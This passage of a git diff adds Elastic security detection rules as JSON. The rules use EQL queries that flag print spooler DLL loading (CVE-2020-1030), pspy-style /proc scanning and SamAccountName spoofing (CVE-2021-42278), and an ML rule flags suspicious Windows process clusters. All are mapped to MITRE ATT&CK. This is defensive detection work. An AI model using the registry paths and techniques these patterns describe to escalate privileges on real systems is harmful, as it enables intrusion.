"https://attack.mitre.org/techniques/T1056/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 112 + }, + "id": "bd2c86a0-8b61-4457-ab38-96943984e889_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_105.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_105.json new file mode 100644 index 00000000000..228331e24ee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_105.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit a privilege escalation vulnerability (CVE-2020-1030) related to the print spooler service. Exploitation involves chaining multiple primitives to load an arbitrary DLL into the print spooler process running as SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler Point and Print DLL", + "query": "sequence by host.id with maxspan=30s\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\"]\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\*\"]\n", + "references": [ + "https://www.accenture.com/us-en/blogs/cyber-defense/discovering-exploiting-shutting-down-dangerous-windows-print-spooler-vulnerability", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Privilege%20Escalation/privesc_sysmon_cve_20201030_spooler.evtx", + "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1030" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bd7eefee-f671-494e-98df-f01daf9e5f17", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 105 + }, + "id": "bd7eefee-f671-494e-98df-f01daf9e5f17_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_106.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_106.json new file mode 100644 index 00000000000..40d81f2fead --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_106.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit a privilege escalation vulnerability (CVE-2020-1030) related to the print spooler service. Exploitation involves chaining multiple primitives to load an arbitrary DLL into the print spooler process running as SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler Point and Print DLL", + "query": "sequence by host.id with maxspan=30s\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\"]\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\*\"]\n", + "references": [ + "https://www.accenture.com/us-en/blogs/cyber-defense/discovering-exploiting-shutting-down-dangerous-windows-print-spooler-vulnerability", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Privilege%20Escalation/privesc_sysmon_cve_20201030_spooler.evtx", + "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1030" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bd7eefee-f671-494e-98df-f01daf9e5f17", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "bd7eefee-f671-494e-98df-f01daf9e5f17_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6.json new file mode 100644 index 00000000000..bb4b29d351a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Pspy Process Monitoring Detected", + "query": "sequence by process.pid, host.id with maxspan=5s\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"openat\" and file.path == \"/proc\" and\n auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n", + "references": [ + "https://github.com/DominicBreuker/pspy" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc", + "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /proc/ -p r -k audit_proc\"\n\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7.json new file mode 100644 index 00000000000..9e923a20478 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Pspy Process Monitoring Detected", + "query": "sequence by process.pid, host.id with maxspan=5s\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"openat\" and file.path == \"/proc\" and\n auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n", + "references": [ + "https://github.com/DominicBreuker/pspy" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc", + "setup": "## Setup\n\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /proc/ -p r -k audit_proc\"\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_108.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_108.json new file mode 100644 index 00000000000..a577d3eff1e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_108.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privileged Escalation via SamAccountName Spoofing", + "query": "iam where event.action == \"renamed-user-account\" and\n /* machine account name renamed to user like account name */\n winlog.event_data.OldTargetUserName : \"*$\" and not winlog.event_data.NewTargetUserName : \"*$\"\n", + "references": [ + "https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e", + "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", + "https://github.com/cube0x0/noPac", + "https://twitter.com/exploitph/status/1469157138928914432", + "https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.NewTargetUserName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OldTargetUserName", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Use Case: Vulnerability" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "bdcf646b-08d4-492c-870a-6c04e3700034_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_3.json b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_3.json new file mode 100644 index 00000000000..c840a2ffa42 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_3.json @@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_host", + "name": "Suspicious Windows Process Cluster Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "bdfebe11-e169-42e3-b344-c5d2015533d3", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "bdfebe11-e169-42e3-b344-c5d2015533d3_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_4.json b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_4.json new file mode 100644 index 00000000000..2ddfad423b6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_4.json @@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_host", + "name": "Suspicious Windows Process Cluster Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "bdfebe11-e169-42e3-b344-c5d2015533d3", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": 